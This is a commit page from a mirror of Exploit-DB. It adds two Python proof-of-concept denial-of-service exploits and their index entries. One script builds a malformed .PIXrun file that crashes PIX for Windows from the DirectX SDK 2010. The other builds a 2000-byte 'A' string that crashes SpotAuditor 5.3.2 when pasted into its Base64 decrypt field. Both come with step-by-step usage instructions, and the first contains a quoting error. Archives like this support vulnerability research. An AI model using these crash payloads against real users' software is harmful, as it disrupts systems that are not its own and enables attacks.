bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-11-28

Browse source 
2 changes to exploits/shellcodes

Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)
SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)
This commit is contained in:
Offensive Security 2019-11-28 05:01:42 +00:00
parent 5543ae6e2e
commit a8008a9f3b
3 changed files with 81 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

48
exploits/windows/dos/47718.py Executable file
View file

@ -0,0 +1,48 @@
#Exploit Title: Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)
#Exploit Author : ZwX
#Exploit Date: 2019-11-26
#Vendor Homepage : https://www.microsoft.com/
#Link Software : https://www.microsoft.com/en-us/download/details.aspx?id=681
#Tested on OS: Windows 7
Proof of Concept (PoC):
=======================
1.Download and install Microsoft DirectX SDK
2.Open the PIX for Windows tools
2.Run the python operating script that will create a file (poc.PIXrun)
3.Run the software "File -> Open File -> Add the file (.PIXrun) "
4.PIX for Windows Crashed
#!/usr/bin/python
DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
poc = DoS
file = open("poc.PIXrun,"w")
file.write(poc)
file.close()
print "POC Created by ZwX"

31
exploits/windows/dos/47719.py Executable file
View file

@ -0,0 +1,31 @@
#Exploit Title: SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)
#Exploit Author : ZwX
#Exploit Date: 2019-11-26
#Vendor Homepage : http://www.nsauditor.com/
#Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
#Tested on OS: Windows 7
'''
Proof of Concept (PoC):
=======================
1.Download and install SpotAuditor
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Tools -> Base64 Encrypted Password
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Base64 Encrypted Password' and click on 'Decrypt'
6.SpotAuditor Crashed
'''
#!/usr/bin/python
http = "http//"
buffer = "\x41" * 2000
poc = http + buffer
file = open("poc.txt","w")
file.write(poc)
file.close()
print "POC Created by ZwX"

2
files_exploits.csv
View file

@ -6609,6 +6609,8 @@ id,file,description,date,author,type,platform,port
47711,exploits/windows/dos/47711.py,"InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)",2019-11-25,chuyreds,dos,windows, 47711,exploits/windows/dos/47711.py,"InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)",2019-11-25,chuyreds,dos,windows,
47716,exploits/ios/dos/47716.py,"iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)",2019-11-26,"Ivan Marmolejo",dos,ios, 47716,exploits/ios/dos/47716.py,"iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)",2019-11-26,"Ivan Marmolejo",dos,ios,
47717,exploits/windows/dos/47717.py,"InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC)",2019-11-26,chuyreds,dos,windows, 47717,exploits/windows/dos/47717.py,"InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC)",2019-11-26,chuyreds,dos,windows,
47718,exploits/windows/dos/47718.py,"Microsoft DirectX SDK 2010 - '.PIXrun' Denial Of Service (PoC)",2019-11-27,ZwX,dos,windows,
47719,exploits/windows/dos/47719.py,"SpotAuditor 5.3.2 - 'Base64' Denial Of Service (PoC)",2019-11-27,ZwX,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,

Can't render this file because it is too large.